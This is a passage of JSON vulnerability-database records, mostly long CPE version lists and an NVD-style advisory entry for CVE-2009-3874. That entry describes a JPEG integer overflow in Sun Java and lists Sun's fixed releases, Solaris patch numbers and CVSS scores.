"cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Integer overflow in the JPEGImageReader implementation in the ImageI/O component in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via large subsample dimensions in a JPEG file that triggers a heap-based buffer overflow, aka Bug Id 6874643.\nPer: http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1\r\n\r\nResolution\r\n\r\nCR 6854303, 6862970, 6872357, 6872358, and 6862969 are addressed in the following releases:\r\n\r\nJava SE for Windows, Solaris, and Linux:\r\n\r\n * JDK and JRE 6 Update 17 or later\r\n * JDK and JRE 5.0 Update 22 or later\r\n\r\nJava SE for Solaris:\r\n\r\n * SDK and JRE 1.4.2_24 or later\r\n\r\nJava SE for Windows:\r\n\r\n * SDK and JRE 1.3.1_27 or later\r\n\r\nJava SE for Business for Windows, Solaris and Linux:\r\n\r\n * JDK and JRE 6 Update 17 or later\r\n * JDK and JRE 5.0 Update 22 or later\r\n * SDK and JRE 1.4.2_24 or later\r\n\r\nThe issues described in CR 6874643 and 6862968 are addressed in the following releases:\r\n\r\nJava SE for Windows, Solaris, and Linux:\r\n\r\n * JDK and JRE 6 Update 17 or later\r\n * JDK and JRE 5.0 Update 22 or later\r\n\r\nJava SE for Solaris:\r\n\r\n * SDK and JRE 1.4.2_24 or later\r\n\r\nJava SE for Business for Windows, Solaris and Linux:\r\n\r\n * JDK and JRE 6 Update 17 or later\r\n * JDK and JRE 5.0 Update 22 or later\r\n * SDK and JRE 1.4.2_24 or later\r\n\r\nJava SE releases are available at:\r\n\r\nJDK and JRE 6 Update 17:\r\n\r\n * http://java.sun.com/javase/downloads/index.jsp\r\n\r\nJRE 6 Update 17:\r\n\r\n * http://java.com/\r\n * Through the Java Update tool for Microsoft Windows users\r\n\r\nJDK 6 Update 17 for Solaris is available in the following patches:\r\n\r\n * Java SE 6: update 17 (as delivered in patch 125136-18)\r\n * Java SE 6: update 17 (as delivered in patch 125137-18 (64bit))\r\n * Java SE 6_x86: update 17 (as delivered in patch 125138-18)\r\n * Java SE 6_x86: update 17 (as delivered in patch 125139-18 (64bit))\r\n\r\nJDK and JRE 5.0 Update 22:\r\n\r\n * http://java.sun.com/javase/downloads/index_jdk5.jsp\r\n\r\nJDK 5.0 Update 22 for Solaris is available in the following patches:\r\n\r\n * J2SE 5.0: update 22 (as delivered in patch 118666-24)\r\n * J2SE 5.0: update 22 (as delivered in patch 118667-24 (64bit))\r\n * J2SE 5.0_x86: update 22 (as delivered in patch 118668-24)\r\n * J2SE 5.0_x86: update 22 (as delivered in patch 118669-24 (64bit))\r\n\r\nJava SE for Business releases are available at:\r\n\r\n * http://www.sun.com/software/javaseforbusiness/getit_download.jsp\r\n", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3874", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3874"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3874", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3874", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", 